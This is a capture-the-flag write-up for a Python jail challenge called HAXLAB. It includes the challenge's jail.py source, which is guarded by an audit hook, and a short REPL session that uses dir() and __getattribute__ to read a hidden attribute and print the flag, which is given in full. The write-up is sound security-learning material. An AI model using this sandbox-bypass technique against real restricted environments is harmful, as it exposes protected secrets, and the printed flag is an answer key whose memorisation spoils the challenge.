HAXLAB - Flag Leak
Category: PWN
MEDIUM
Welcome to HAXLAB, the world’s most secure MaaS® (math-as-a-service) with advanced functionality.
Note
For this part of the challenge, please submit the contents of flag1.txt.
jail.py
https://cdn.discordapp.com/attachments/840074210935177247/840076657075159040/jail.py
Connect via
nc haxlab.sdc.tf 1337
jail.py
#! /usr/bin/env python3
# flag2.txt and proprietary.py are in the working directory of the script in the hosted version
import sys
import proprietary # Our secure proprietary flag hider for flag1.txt
PROMPT = '>>> '
# Old Python versions are too vulnerable to exploits
if sys.version_info[:3] < (3, 8, 5):
print("Sorry, your Python interpreter version is below the minimum system requirement to run HAXLAB.")
sys.exit(1)
def audit_hook(event, _):
# These are the only necessary events for this Math REPL to work
ALLOWED_EVENTS = set({'builtins.input', 'builtins.input/result', 'exec', 'compile'})
if event not in ALLOWED_EVENTS:
# Thou shalt not hack!
raise RuntimeError('Operation not permitted: {}'.format(event))
flag1 = proprietary.get_flag1()
def repl():
global_dict = dict()
global_dict['flag1'] = flag1
while True:
try:
src = input(PROMPT)
except EOFError:
print() # print newline
break
except KeyboardInterrupt:
print('canceled')
continue
if src == '': # Skip empty lines
continue
try:
code = compile(src, '<string>', 'single')
except SyntaxError as e:
print(e)
continue
try:
exec(code, global_dict)
except Exception as e:
print(e)
print('======= HAXLAB - An advanced yet secure calculator =======\nPowered by Python ' + sys.version)
# You will never trigger these hooks if all you do is Math :)
sys.addaudithook(audit_hook)
del sys
try:
# Enter the HAXLAB shell for the user to do Math
repl()
except Exception as e:
print(e)
Solution
Below is self-explaining…
>>> exec("print(dir())")
['__builtins__', 'flag1']
>>> print(flag1)
<proprietary.Flag1Holder object at 0x7fec38c32a3
>>> print(dir(flag1))
['-flag1-', '__class__', '__delattr__', '__dict__', '__dir__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__gt__', '__hash__', '__init__', '__init_subclass__', '__le__', '__lt__', '__module__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', '__weakref__']
>>> print(flag1.__getattribute__('-flag1-'))
REDACTED
>>> print(flag1.__getattribute__('-flag1-')[:-1])
sdctf{get@ttr_r3ads_3v3ryth1ng}
Flag
sdctf{get@ttr_r3ads_3v3ryth1ng}